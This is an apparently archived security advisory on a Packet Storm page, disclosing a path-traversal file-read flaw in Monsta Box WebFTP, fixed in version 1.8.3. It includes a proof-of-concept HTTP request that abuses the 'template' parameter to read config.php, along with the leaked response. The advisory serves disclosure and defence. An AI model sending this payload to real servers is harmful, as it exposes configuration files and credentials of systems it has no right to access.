Twenty Year Anniversary

Monsta Box WebFTP Arbitrary File Read

Monsta Box WebFTP Arbitrary File Read
Posted Apr 8, 2016
Authored by Imre Rad

Monsta Box WebFTP suffers from an arbitrary file read vulnerability.

tags | exploit, arbitrary, info disclosure
MD5 | c3cf0c2478f30bc077b7bddc73a27652

Monsta Box WebFTP Arbitrary File Read

Change Mirror Download
Application
-----------
"MONSTA Box is a lightweight open-source file manager you can install on
your website or server * to easily manage your files through any browser."
(Description from the official website http://www.monstahq.com/)


Vulnerability
-------------
The Monsta Box WebFTP application supports file templates when creating
new files. The template parameter is part of the HTTP request so it is a
user input and it was not sanitized correctly. By sending a HTTP request
with modified template parameter it was possible to traverse the
template directory and read arbitrary files (in context of the Monsta
Box WebFTP application).


PoC
---
A proof of concept request/response to read the config.php file of the
Monsta Box installation (note the template parameter of the HTTP request):

POST /? HTTP/1.1
Host: somehost
Referer: http://somereferer/
Content-Length: 352
Cookie: PHPSESSID=somecookie


&ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Mar 2016 19:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache

1cac
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:
60px; width: 1030px;"><div id="popupHeaderAction">Editing:
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input
type="hidden" name="file" value="~/xxx"><textarea name="editContent"
id="editContent" style="height: 608px;"><?php

# Open README file for descriptions and help.

$ftpHost = "somehost";
$ftpPort = "21";

...


Affected versions
-----------------
The above vulnerability was fixed in version 1.8.3. Older versions of
Monsta Box with template support are vulnerable.


Timeline
--------
2016-03-29: Vendor contacted for appropriate contact person to report to
2016-03-30: Vulnerability was reported
2016-03-31: Fixed version was published
2016-04-07: Public disclosure


Discovered by
-------------
Imre RAD
www.search-lab.hu
www.scademy.com



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    17 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close